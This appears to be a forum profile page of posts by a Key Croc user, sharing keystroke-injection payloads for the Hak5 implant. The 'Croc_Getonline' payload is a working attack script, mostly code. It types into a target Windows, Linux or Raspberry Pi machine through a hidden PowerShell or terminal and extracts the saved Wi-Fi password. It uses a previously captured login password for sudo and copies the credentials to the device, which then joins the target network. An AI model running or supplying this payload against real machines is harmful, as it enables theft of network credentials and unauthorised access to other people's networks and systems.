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Everything posted by spywill

  1. Sometimes I find myself having a hard time running payloads because of my Numlock stat on my keyboard, for some reason after a reboot of my pc my keyboard Numlock stat will be off and my payloads will fail to execute in this stat it will not quack any numbers, I press the Numlock key to turn it to on stat and then run the payload and then payload execute. i'm not sure if this will fix the issue
  2. Try these payloads and see if they help you to connect to a wifi access point. This payload just edit in your SSID name and password and then add payload to keycroc payload folder reboot keycroc and then type in match word (mywifi) led will turn green keycroc should be connected to wifi access point. May want to delete the config file off your keycroc first just in case its corrupted in some way don't worry the keycroc will generate a new config file on next boot. # Title: WIFI-SETUP # Description: Connect to access point quickly by match word add ssid and passwd # Author: spywill # Version: 1.4 # Category: Key Croc MATCH mywifi SSID_NAME=ADD_SSID_NAME_HERE SSID_PASSWD=ADD_PASSWORD_HERE LED SETUP sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID $SSID_NAME\nWIFI_PASS $SSID_PASSWD\nSSH ENABLE' /root/udisk/config.txt sleep 1 PID_WPA=$(pidof wpa_supplicant) PID_DHC=$(pidof dhclient) ifconfig wlan0 down echo -ne "network={\n\tssid=\"$SSID_NAME\"\n\tpsk=\"$SSID_PASSWD\"\n\tpriority=1\n}" > /etc/wpa_supplicant.conf kill -9 $PID_WPA && kill -9 $PID_DHC sleep 2 ifconfig wlan0 up sleep 2 wpa_supplicant -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf -B && dhclient wlan0 sleep 5 systemctl restart ssh.service sleep 1 if : >/dev/tcp/; then LED FINISH else LED R fi sleep 3 LED OFF This payload just add to keycroc payload folder reboot keycroc and then type in match word getonline_W <-- MATCH word for windows getonline_L <-- MATCH word for Linux getonline_R <-- MATCH word for Raspberry pi then led will turn green keycroc should be connected to wifi access point. # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point # Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt # Author: spywill # Version: 3.5 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro MATCH (getonline_W|getonline_R|getonline_L) CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt if [ -f $wifi_pass ]; then cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt rm -f $wifi_pass fi ATTACKMODE HID STORAGE Q DELAY 5000 LED ATTACK case $LOOT in getonline_W) Q GUI r Q DELAY 3000 Q STRING "powershell -NoP -NonI -W Hidden" Q ENTER Q DELAY 5000 Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" Q ENTER Q DELAY 3000 Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" Q ENTER Q DELAY 2000 Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" Q ENTER Q DELAY 2000 Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" Q ENTER Q DELAY 5000 Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" Q ENTER ;; getonline_R) Q CONTROL-ALT-d Q CONTROL-ALT-t Q DELAY 2000 Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" Q ENTER Q DELAY 2000 Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" Q ENTER Q DELAY 2000 Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" Q ENTER Q DELAY 2000 Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" Q ENTER Q DELAY 3000 Q STRING "umount \$MOUNT_POINT ; exit" Q ENTER ;; getonline_L) if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) else PC_PW=LINUX fi Q CONTROL-ALT-d Q ALT-t Q DELAY 2000 Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" Q ENTER Q DELAY 2000 Q STRING "$PC_PW" Q ENTER Q DELAY 2000 Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" Q ENTER Q DELAY 2000 Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" Q ENTER Q DELAY 2000 Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" Q ENTER Q DELAY 3000 Q STRING "sudo umount \$MOUNT_POINT ; exit" Q ENTER ;; esac ATTACKMODE HID sleep 3 LED SETUP kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then sed -i '0,/./s/^.//' $wifi_pass sed -i 's/\r//g' $wifi_pass fi sed -i 's/\( \)*/\1/g' $wifi_pass sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf ifconfig wlan0 up wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 sleep 3 systemctl restart ssh.service [ : >/dev/tcp/ ] && LED FINISH || LED R sleep 3 LED OFF
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